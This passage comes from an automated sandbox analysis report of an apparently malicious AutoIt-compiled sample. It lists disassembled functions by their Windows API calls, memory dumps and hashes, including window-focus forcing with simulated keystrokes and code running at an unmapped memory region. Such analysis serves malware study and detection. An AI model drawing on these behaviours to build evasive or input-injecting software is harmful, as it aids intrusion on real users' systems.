                                                                        • Part of subcall function 009C4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A03CDE,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E62
                                                                        • Part of subcall function 009C4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009C4E74
                                                                        • Part of subcall function 009C4E59: FreeLibrary.KERNEL32(00000000,?,?,00A03CDE,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E87
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressFreeProc
                                                                      • String ID:
                                                                      • API String ID: 2632591731-0
                                                                      • Opcode ID: a6f6b811c705559910791151f3e14effc66644c81fd299d8ad864d79610c1cb3
                                                                      • Instruction ID: a4d26a936b433b35caf3809a28a05c1141e6f4e8b18bfe53bf5b7e0ed8c420f3
                                                                      • Opcode Fuzzy Hash: a6f6b811c705559910791151f3e14effc66644c81fd299d8ad864d79610c1cb3
                                                                      • Instruction Fuzzy Hash: 29112332B00305AADF10FB60DC22FAD77A5AF84710F10882EF442A71C1EEB0AE459B52
                                                                      Function 009F8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: __wsopen_s
                                                                      • String ID:
                                                                      • API String ID: 3347428461-0
                                                                      • Opcode ID: 89e349211f01354c326f8efc4dd79caca478ceb319e9648ca1544029531616e2
                                                                      • Instruction ID: 82d3bca0dc393ade09d53a9b32633d88d2bc5ad3f946b72b3696235e033f9e74
                                                                      • Opcode Fuzzy Hash: 89e349211f01354c326f8efc4dd79caca478ceb319e9648ca1544029531616e2
                                                                      • Instruction Fuzzy Hash: 6C111875A0410EAFCB05DF58E941AAF7BF9EF48314F144059F908AB312DB31DA21CBA5
                                                                      Function 009EE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                      • Instruction ID: 81f59679942a3fff2f9ba1dd77d2ad901eec2066ac72931f9ab5e44b76e656f4
                                                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                      • Instruction Fuzzy Hash: 6DF0F432511A5896CA333B6B9C05B6B339C9FD2734F100B15F620932D2DB74EC0187A9
                                                                      Function 009F3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6,?,009C1129), ref: 009F3852
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: cd67f8e9986730b79ee94305c1bee205a2a22169bc943e2d65795282f100027c
                                                                      • Instruction ID: cb60bbcab20059ec9b8df8cb91c5259969e833fd63556daf0c4e4cf28b020ab2
                                                                      • Opcode Fuzzy Hash: cd67f8e9986730b79ee94305c1bee205a2a22169bc943e2d65795282f100027c
                                                                      • Instruction Fuzzy Hash: C9E0E53110026CA6D62226B79D00BBB365CAB827F0F158121BE1596A80DB1DDD0183E0
                                                                      Function 009C4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4F6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 75212522800a4db5dbed0042195e5f38987af8eb17f50adaeb63062896c44fea
                                                                      • Instruction ID: f9085a4249be326744c756c956ca2bc74e24a8c5f72a646d65238c5a49f00eeb
                                                                      • Opcode Fuzzy Hash: 75212522800a4db5dbed0042195e5f38987af8eb17f50adaeb63062896c44fea
                                                                      • Instruction Fuzzy Hash: B5F03971A05752CFDB349F65D4A0E22BBE8BF143293208E7EE1EA82621CB359844DF51
                                                                      Function 009C2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009C2DC4
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_wcslen
                                                                      • String ID:
                                                                      • API String ID: 541455249-0
                                                                      • Opcode ID: 7c62105417c82fff15a050078eda3bab117e9eca0e75e385ce54907635e8a4e2
                                                                      • Instruction ID: 81130d36e5d43e7e52ed32135abf5e128a5d4c67661a296463a33e8f790c9176
                                                                      • Opcode Fuzzy Hash: 7c62105417c82fff15a050078eda3bab117e9eca0e75e385ce54907635e8a4e2
                                                                      • Instruction Fuzzy Hash: FDE0CD72A042245BC710E2989C05FDA77DDDFC8790F040075FD09E7248D960AD808551
                                                                      Function 009C2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009C3908
                                                                        • Part of subcall function 009CD730: GetInputState.USER32 ref: 009CD807
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 009C2B6B
                                                                        • Part of subcall function 009C30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 009C314E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                      • String ID:
                                                                      • API String ID: 3667716007-0
                                                                      • Opcode ID: 2cb0d400916fbf60e58d59a386615c58c750cdf69f424580adb9d08430c0b4c6
                                                                      • Instruction ID: d913f56003291fc7e0c99b96b4fe698ec79b30a8eba331cec3b9b7051e3104a5
                                                                      • Opcode Fuzzy Hash: 2cb0d400916fbf60e58d59a386615c58c750cdf69f424580adb9d08430c0b4c6
                                                                      • Instruction Fuzzy Hash: 38E08662B0434507CA04FB749856F7DB7599BD9361F40953EF146871A2CE2449478253
                                                                      Function 00A0039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00A00704,?,?,00000000,?,00A00704,00000000,0000000C), ref: 00A003B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: d0c96af602b3b42ea21f0b8b123e19a5e449e28ad2fcd324ef9661b22758d50e
                                                                      • Instruction ID: 7a7013bd8e8619ee63f63d5531ea2acce1084ae0fbf575596ee8625fcdae9d2c
                                                                      • Opcode Fuzzy Hash: d0c96af602b3b42ea21f0b8b123e19a5e449e28ad2fcd324ef9661b22758d50e
                                                                      • Instruction Fuzzy Hash: D8D06C3204020DBFDF028F84DD06EDA3BAAFB48714F014100BE1856020C732E822AB90
                                                                      Function 009C1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 009C1CBC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem
                                                                      • String ID:
                                                                      • API String ID: 3098949447-0
                                                                      • Opcode ID: 52f3d63a0d82a3faf12fbe9cc7ac3ab51eb14286f90a340735dc5b676afb160c
                                                                      • Instruction ID: 8cf4dc8ad14e8c34ca6b48680a8c39a5f4434255fa68067e5bf8a86622928850
                                                                      • Opcode Fuzzy Hash: 52f3d63a0d82a3faf12fbe9cc7ac3ab51eb14286f90a340735dc5b676afb160c
                                                                      • Instruction Fuzzy Hash: 58C0483A3C0305AEE214CBD0AC4AF117764A348B15F448002F609A95E39AA22822EA50
                                                                      Function 016E1E24 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 016E1E39
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_16df000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction ID: 6a2a17872f555c8f631528c15d0754513266645a1537841f425d93a0199b205d
                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction Fuzzy Hash: DEE0BF7494120DEFDB00DFA4D94D6DE7BB4EF04701F1006A1FD05D7680DB309E549A62
                                                                      Function 016E1E28 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 016E1E39
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_16df000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: d8358a2679c19ecd8ff64a8dd6ec32f4d8104b152ade8180b4f6df970b159472
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: EBE0E67494120DDFDB00DFB4D94D6DE7BF4EF04701F100261FD01D2280D6309D509A62

                                                                      Non-executed Functions

                                                                      Function 00A59576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A5961A
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A5965B
                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00A5969F
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A596C9
                                                                      • SendMessageW.USER32 ref: 00A596F2
                                                                      • GetKeyState.USER32(00000011), ref: 00A5978B
                                                                      • GetKeyState.USER32(00000009), ref: 00A59798
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A597AE
                                                                      • GetKeyState.USER32(00000010), ref: 00A597B8
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A597E9
                                                                      • SendMessageW.USER32 ref: 00A59810
                                                                      • SendMessageW.USER32(?,00001030,?,00A57E95), ref: 00A59918
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A5992E
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A59941
                                                                      • SetCapture.USER32(?), ref: 00A5994A
                                                                      • ClientToScreen.USER32(?,?), ref: 00A599AF
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A599BC
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A599D6
                                                                      • ReleaseCapture.USER32 ref: 00A599E1
                                                                      • GetCursorPos.USER32(?), ref: 00A59A19
                                                                      • ScreenToClient.USER32(?,?), ref: 00A59A26
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A59A80
                                                                      • SendMessageW.USER32 ref: 00A59AAE
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A59AEB
                                                                      • SendMessageW.USER32 ref: 00A59B1A
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A59B3B
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A59B4A
                                                                      • GetCursorPos.USER32(?), ref: 00A59B68
                                                                      • ScreenToClient.USER32(?,?), ref: 00A59B75
                                                                      • GetParent.USER32(?), ref: 00A59B93
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A59BFA
                                                                      • SendMessageW.USER32 ref: 00A59C2B
                                                                      • ClientToScreen.USER32(?,?), ref: 00A59C84
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A59CB4
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A59CDE
                                                                      • SendMessageW.USER32 ref: 00A59D01
                                                                      • ClientToScreen.USER32(?,?), ref: 00A59D4E
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A59D82
                                                                        • Part of subcall function 009D9944: GetWindowLongW.USER32(?,000000EB), ref: 009D9952
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A59E05
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                      • String ID: @GUI_DRAGID$F
                                                                      • API String ID: 3429851547-4164748364
                                                                      • Opcode ID: 4d625834d86e6307222d683a0d2d043641c38992f9329f66ddeac9f65158ff2b
                                                                      • Instruction ID: b157d48536fc23fac54bba36084730a8d08485f4d1c636a8a5795a0f34f45155
                                                                      • Opcode Fuzzy Hash: 4d625834d86e6307222d683a0d2d043641c38992f9329f66ddeac9f65158ff2b
                                                                      • Instruction Fuzzy Hash: 7C429C70204301EFDB21CF64CD44BABBBE5FF48321F100A1AFA998B6A1D731A959DB41
                                                                      Function 00A54873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00A548F3
                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00A54908
                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00A54927
                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00A5494B
                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00A5495C
                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00A5497B
                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00A549AE
                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00A549D4
                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00A54A0F
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A54A56
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A54A7E
                                                                      • IsMenu.USER32(?), ref: 00A54A97
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A54AF2
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A54B20
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A54B94
                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00A54BE3
                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00A54C82
                                                                      • wsprintfW.USER32 ref: 00A54CAE
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A54CC9
                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00A54CF1
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A54D13
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A54D33
                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00A54D5A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                      • String ID: %d/%02d/%02d
                                                                      • API String ID: 4054740463-328681919
                                                                      • Opcode ID: 4c379557ef5885afde41ed9b74fa7d18026b7b2688b222d31e454a102b165da6
                                                                      • Instruction ID: 6d011859bd0b53c2d17dc7a7f11ac9e86c2b4ff32689212c8a93c7d54847fcf3
                                                                      • Opcode Fuzzy Hash: 4c379557ef5885afde41ed9b74fa7d18026b7b2688b222d31e454a102b165da6
                                                                      • Instruction Fuzzy Hash: 9612FF71600304ABEB248F68CC49FAE7BB8FF89715F104119F916DA2A1D7789A89CB50
                                                                      Function 009DF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 009DF998
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A1F474
                                                                      • IsIconic.USER32(00000000), ref: 00A1F47D
                                                                      • ShowWindow.USER32(00000000,00000009), ref: 00A1F48A
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00A1F494
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A1F4AA
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A1F4B1
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A1F4BD
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A1F4CE
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A1F4D6
                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00A1F4DE
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00A1F4E1
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A1F4F6
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00A1F501
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A1F50B
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00A1F510
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A1F519
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00A1F51E
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A1F528
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00A1F52D
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00A1F530
                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00A1F557
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 4125248594-2988720461
                                                                      • Opcode ID: 30fda21bc841c4dd628ed4c0504131f45447746d4ab5e16c0f8f4c4313af71a9
                                                                      • Instruction ID: ef30cebe8fa36e606d331dd529870a0ab961f8863b57b734cac50489cc8a7c1f
                                                                      • Opcode Fuzzy Hash: 30fda21bc841c4dd628ed4c0504131f45447746d4ab5e16c0f8f4c4313af71a9
